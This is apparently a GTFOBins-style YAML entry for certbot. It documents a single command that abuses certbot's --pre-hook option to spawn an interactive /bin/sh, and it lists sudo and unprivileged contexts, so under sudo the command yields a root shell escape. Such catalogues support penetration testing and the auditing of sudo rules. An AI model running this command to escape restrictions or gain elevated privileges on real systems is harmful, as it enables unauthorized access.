Files
2026-01-06 17:52:30 +01:00

12 lines
313 B
Plaintext

---
functions:
shell:
- code: |-
certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'
comment: |-
This needs a writable directory, replace `.` if needed.
contexts:
sudo:
unprivileged:
...